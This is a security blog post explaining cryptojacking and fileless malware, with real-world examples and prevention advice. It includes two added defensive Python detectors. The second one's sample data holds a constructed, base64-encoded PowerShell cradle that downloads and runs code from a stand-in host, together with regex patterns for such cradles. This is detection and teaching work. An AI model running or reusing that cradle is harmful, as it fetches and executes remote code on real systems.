In the fast-paced world of today, it’s easy to overlook the looming threat malware poses to our security. We often take for granted the functions that antivirus (AV) software provides and tend to ignore what happens in the background of our systems and processes. Behind the scenes, cyber attackers take advantage of this negligence to inflict damage and wreak havoc. For this reason, it’s crucial to peel back the layers of obfuscation between us and the malware that affects our digital security, to better understand and prevent it.
Today, we’re going to do just that – step back, dig into some modern malware techniques, and hopefully come away armed with the knowledge we need to stay safe.
Cryptojacking – Mining in The Shadows
Cryptojacking is a relatively new form of malware, gaining prominence with the rise of cryptocurrency. It’s unique in that it does not seek to destroy or steal confidential data, but instead conceals itself in the hope of quietly consuming computer resources.
How Does Cryptojacking Work?
To understand how cryptojacking works, it’s important to understand how people earn cryptocurrency. In simple terms, “mining” is the process by which transactions are verified and added to a blockchain, the underlying technology powering most cryptocurrencies. To use Bitcoin as an example – to get access to newly generated Bitcoin, miners compete to solve a cryptographic math problem.
Once the correct solution is found (often through lots of time and computing power), the miner broadcasts it to the network. The solution is verified and, if correct, the miner is rewarded with a newly created Bitcoin. Since this is essentially a race, it is in the miners’ best interest to have as much processing power as possible.
Cryptojacking takes advantage of this need for processing power by hijacking the system resources of an unsuspecting victim’s devices. The victim is normally unaware of this happening, as the “resource theft” is occurring in the background without noticeable disruption to the device’s normal functions.
Types of Cryptojacking
There are a couple of common forms of cryptojacking. The more traditional method involves a victim acquiring it through a suspicious email link or executable file. In this case, the malicious code is loaded directly into the victim’s computer and runs locally. The actual code that performs the mining can also be inserted into seemingly harmless applications or executables. As such, the victim will continue using the application normally, not suspecting that resources are being stolen behind the scenes.
Drive-by or Browser-Based Approach
Another form of attack is the “drive-by” or “browser-based” approach. These attacks work by embedding malicious JavaScript into a website. Whenever a user lands on that website, the code runs and mining starts. This method of running malicious code on a website is less harmful to the victim’s resources, since the code stops running as soon as they close the site.
However, it impacts every user who comes to the site. The user also may not realize that the website is still running the code, especially if it uses a hidden window like a pop-under that remains hidden under the taskbar.
Historically, browser-based cryptomining was often a conscious way to upscale revenue as an alternative to advertisements. The websites that employed this strategy did so with the consent of the user, ensuring that the mining didn’t affect user performance. In the context of cryptojacking, the code is often inserted because of a breach, and the owner of the website is unaware of what’s happening.
Fileless In-Memory Cryptojacking
The most dangerous of all is fileless in-memory cryptojacking. Once the malware reaches the system via a zero-day vulnerability or phishing, cryptojackers can use PowerShell to execute code remotely straight into memory, allowing them to bypass antivirus (AV) software. This form of cryptojacking can quickly turn into ransomware, as attackers can run remote commands for other purposes. It uses registry keys or scheduled tasks for persistence and propagation, allowing it to become a consistent and unrelenting threat.
Cryptojacking in the Wild
PCASTLE (also known as Beapy) is a cryptominer identified in December 2018. It was initially discovered in a supply chain attack targeting DriveTheLife, an application that “provided driver updates”. The domain from which DriveTheLife downloaded driver updates was being manipulated by a threat actor, downloading malicious payloads onto the victim’s computer.
PCASTLE uses Python and PowerShell to deliver the cryptominer itself and is considered a “worm-crypto miner combo”, with the ability to move laterally and exploit common system vulnerabilities, such as EternalBlue.
To maintain its stealthy nature, it also checks twice per second whether any processes from a list it deems “resource-intensive” are running – this list includes popular games, and the Task Manager itself, ensuring that the victim stays unaware of what’s happening.
GhostMiner is a fileless cryptominer – What does a “fileless” cryptominer entail? Stay tuned! – first observed in 2018. It weaponizes WMI objects for its persistence. Interestingly, it also disables other cryptojacking processes it detects to maximize its efficiency.
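The two behaviours described above for PCASTLE, a sustained mining load and a process that goes quiet whenever Task Manager is open, are also what a defender can look for. The block below is an added example, not code from this post or from any published analysis of PCASTLE: it scores constructed per-process CPU telemetry (the agent schema, process names and readings are all made up for the example) and flags a process that is persistently busy and throttles itself while taskmgr.exe is running.

```python
"""
Added, constructed example: score per-process CPU readings for a sustained
mining load combined with Task-Manager-aware throttling. The telemetry
schema and the sample readings are invented for the example.
"""
from collections import defaultdict
from dataclasses import dataclass
from statistics import mean


@dataclass(frozen=True)
class Sample:
    """One reading from an endpoint agent (constructed schema, not a real product's)."""
    t: int              # seconds since the start of the capture
    process: str        # image name of the sampled process
    cpu: float          # percent of one core consumed during this interval
    taskmgr_open: bool  # whether taskmgr.exe existed at this instant


def build_telemetry() -> list:
    """Synthesise 60 s of 1 Hz readings for three processes.

    updatehelper.exe is the constructed miner: it sits at 95% CPU but drops to
    2% during the window in which Task Manager is open (t = 20..29).
    svchost.exe is idle and chrome.exe is busy but steady, as a control.
    """
    samples = []
    for t in range(60):
        tm_open = 20 <= t < 30
        samples.append(Sample(t, "svchost.exe", 1.0 + (t % 3), tm_open))
        samples.append(Sample(t, "chrome.exe", 55.0 + (t % 5), tm_open))
        samples.append(Sample(t, "updatehelper.exe", 2.0 if tm_open else 95.0, tm_open))
    return samples


def score_processes(samples, busy_threshold=70.0, busy_fraction=0.6,
                    evasion_drop=50.0) -> dict:
    """Return {process: {"busy_fraction": f, "evasion_drop": d, "suspect": bool}}.

    busy_fraction  share of Task-Manager-closed readings at or above busy_threshold
    evasion_drop   mean CPU with Task Manager closed minus mean CPU with it open
    A process is a suspect when it is both persistently busy and throttles
    itself by at least evasion_drop points while Task Manager is visible.
    """
    closed = defaultdict(list)
    opened = defaultdict(list)
    for s in samples:
        (opened if s.taskmgr_open else closed)[s.process].append(s.cpu)

    report = {}
    for proc, readings in closed.items():
        busy = sum(1 for c in readings if c >= busy_threshold) / len(readings)
        drop = mean(readings) - mean(opened[proc]) if opened.get(proc) else 0.0
        report[proc] = {
            "busy_fraction": round(busy, 2),
            "evasion_drop": round(drop, 1),
            "suspect": busy >= busy_fraction and drop >= evasion_drop,
        }
    return report


def suspects(samples) -> list:
    """Names of the processes flagged by score_processes, sorted for stable output."""
    return sorted(p for p, r in score_processes(samples).items() if r["suspect"])


if __name__ == "__main__":
    for proc, r in score_processes(build_telemetry()).items():
        print(f"{proc:<20} busy={r['busy_fraction']:.2f} "
              f"drop={r['evasion_drop']:>5} suspect={r['suspect']}")
```

The evasion signal is the useful part: a steadily busy process (chrome.exe here) is not flagged on load alone, while a process whose load tracks the presence of Task Manager is exactly the shape the post describes. On a real fleet the Task Manager flag would come from process-creation and termination events rather than a boolean in each sample.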
Prevention & Mitigation Strategies
Despite cryptojacking being hard to detect, there are a couple of best practices that will minimize the risk of infection:
- Staying up-to-date → ensuring that all the necessary software and device patches and fixes are applied minimizes the risk of known vulnerabilities being exploited to gain access to your systems.
- Analyzing your emails → always triple-check who you’re receiving emails from (Does the domain have a typo?) and what they want from you (Are they sending you an unexpected attachment? Are they asking you to click a link?).
- Avoiding suspicious websites → sometimes the best thing to do is to trust your gut. A good safety precaution is having an ad-blocker such as uBlock Origin installed, which should automatically block pop-ups and websites other users have flagged as unsafe.
As a rule of thumb, if you notice any symptoms and suspect you might be infected, performing a clean factory reset is the best way to ensure your systems are clean.
Fileless Attacks – Malware Beyond Files
Fileless malware is an emerging threat – it’s complex and evasive, abusing pre-installed programs to run malicious code. Traditional signature-based analysis is unable to detect it for this reason.
How Does Fileless Malware Work?
Fileless malware is designed to run in system memory, leaving no artifacts on the victim’s hard drive. Because it runs in memory, its existence on the system lasts only until the system is rebooted – persistence techniques, however, allow it to maintain its presence for much longer. Attackers can gain access to the system in several ways, including zero-day vulnerabilities in pre-installed tools, phishing, or stolen credentials.
Once the attacker has gained access to the system, remaining there is imperative. Oftentimes, persistence is acquired by injecting malicious code into unusual locations associated with the operating system or common utilities (the Windows registry, WMI tasks, SQL tables or Scheduled Tasks are common locations). The attacker is then able to exfiltrate data and use it for nefarious purposes, including ransomware and the like.
Types of Fileless Malware
Fileless malware can be divided into two main categories, based on the execution method: RAM-resident (or Memory-resident), and Script-based.
Memory-resident malware executes in RAM, allowing it to bypass most antivirus solutions. Antivirus checks are typically done when a new process starts – this is avoided entirely by injecting malicious code into processes already running on the system. Since there are no physical artifacts associated with it, signature-based detection is also avoided.
Script-based malware specifically exploits vulnerabilities present in Microsoft Office and PowerShell. They come in the form of malicious “scripts”, which are interpreted by Windows. They can also be obfuscated and split up to avoid signature and behavioral detection.
Fileless Malware in the Wild
Poweliks emerged in early 2014 and is the evolution of the file-based threat known as Wowliks. Once Poweliks has infected its victim’s computer, it acts as a click-fraud botnet that visits web pages in a hidden browser that displays advertisements. These advertisements can carry malicious content of their own, so the infection often spirals once Poweliks starts running. It lives in the registry and uses rundll32.exe to execute commands.
KOVTER was the number one source of crimeware infections in May 2018. It initially started as police ransomware and eventually evolved into an evasive fileless malware. Its main infection method is via attachments coming from macro-based spam – once the malicious attachment is clicked, the malware installs itself into the registry with code that performs KOVTER’s processes. Once all the scripts associated with the malware are set up, a watchdog process is created, which continuously monitors and confirms the existence of these scripts.
Prevention & Mitigation Strategies
- Policies that protect against email threats should be implemented, lowering the risk of an attacker being able to infect a system.
- For memory-resident malware, an antivirus solution should be able to analyze RAM captures, as well as dump any malicious processes – for further analysis, manual inspection with a tool such as Volatility is recommended.
- Behavior-based detection → monitor the system for suspicious events and processes, including every newly spawned PowerShell process and other odd behavior.
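The last point, monitoring new PowerShell processes, is where most fileless detections actually happen. The block below is an added example, not code from this post or from any vendor: it triages process-creation events for three of the patterns described in this section, PowerShell launched with a hidden window and an encoded in-memory download command, a script host spawned by an Office application (the macro-based spam delivery attributed to KOVTER), and rundll32.exe being handed a `javascript:` argument instead of a DLL (the rundll32 execution attributed to Poweliks). The field names Image, ParentImage and CommandLine follow the Sysmon process-creation event; every path, command line and the example.invalid host are constructed for the example.

```python
"""
Added, constructed example: triage of process-creation events for the
script-based fileless patterns described above. Field names follow the
Sysmon process-creation event; all values are invented for the example.
"""
import base64
import re

SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe", "mshta.exe", "cmd.exe"}
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}

# -e, -enc and -encodedcommand are the spellings this example recognises;
# PowerShell also accepts other unambiguous prefixes (-ec, -en, ...).
ENC_RE = re.compile(r"-e(?:nc(?:odedcommand)?)?\s+([A-Za-z0-9+/=]+)", re.I)
HIDDEN_RE = re.compile(r"-w(?:indowstyle)?\s+hidden", re.I)
# Cmdlets and aliases used to fetch and run code without touching disk.
CRADLE_RE = re.compile(
    r"downloadstring|downloadfile|invoke-expression|\biex\b|net\.webclient|invoke-webrequest|\biwr\b",
    re.I,
)


def encode_command(script: str) -> str:
    """Encode a script the way -EncodedCommand expects it: UTF-16LE, then base64."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(cmdline: str):
    """Return the decoded script if the command line carries an encoded command, else None."""
    match = ENC_RE.search(cmdline)
    if not match:
        return None
    try:
        return base64.b64decode(match.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def _basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def triage(event: dict) -> list:
    """Return the reasons this event deserves analyst attention (empty list = nothing seen)."""
    image = _basename(event.get("Image", ""))
    parent = _basename(event.get("ParentImage", ""))
    cmd = event.get("CommandLine", "")
    reasons = []

    decoded = decode_encoded_command(cmd) if image in ("powershell.exe", "pwsh.exe") else None
    if decoded is not None:
        reasons.append("encoded PowerShell command")
    if image in ("powershell.exe", "pwsh.exe") and HIDDEN_RE.search(cmd):
        reasons.append("hidden window")
    # Scan the decoded script as well; a cradle hidden inside -Enc is otherwise never seen.
    if CRADLE_RE.search(cmd + " " + (decoded or "")):
        reasons.append("download cradle / in-memory execution")
    if image in SCRIPT_HOSTS and parent in OFFICE_PARENTS:
        reasons.append(f"script host spawned by {parent}")
    if image == "rundll32.exe" and "javascript:" in cmd.lower():
        reasons.append("rundll32 handed script instead of a DLL")
    return reasons


# Constructed sample events (Sysmon-style field names, invented values).
SAMPLE_EVENTS = [
    {   # macro-spawned, hidden, encoded in-memory download (KOVTER-style delivery)
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
        "CommandLine": "powershell.exe -NoP -W Hidden -Enc " + encode_command(
            "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/stage')"),
    },
    {   # registry-resident loader re-launched through rundll32 (Poweliks-style)
        "Image": r"C:\Windows\System32\rundll32.exe",
        "ParentImage": r"C:\Windows\explorer.exe",
        "CommandLine": 'rundll32.exe javascript:"CONSTRUCTED_PLACEHOLDER"',
    },
    {   # an administrator's scheduled script: noisy flags, but nothing fileless
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "ParentImage": r"C:\Windows\System32\cmd.exe",
        "CommandLine": r"powershell.exe -ExecutionPolicy Bypass -File C:\scripts\backup.ps1",
    },
]


def triage_all(events) -> dict:
    """Map each event's position to its reasons, the unit a SIEM rule would emit."""
    return {i: triage(e) for i, e in enumerate(events)}


if __name__ == "__main__":
    for i, reasons in triage_all(SAMPLE_EVENTS).items():
        print(i, reasons or "clean")
```

Two details matter in practice. Decoding the -EncodedCommand payload (UTF-16LE under base64) before pattern-matching is what turns an opaque blob into a readable download cradle, and the parent-child relationship (an Office process spawning a script host) is a stronger signal than any single command-line flag, because it survives obfuscation of the script itself.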
About Author & Author Note
Ana Batranović is one of the youngest stars in the UN1QUELY sky. An energetic penetration tester, ethical hacker, and certified Red Team operator, she is eagerly broadening her cybersecurity and tech knowledge around the clock. Also, a little note from the author herself: “Thank you for reading this blog! I had a lot of fun making it, and I hope you’ve learned something new.”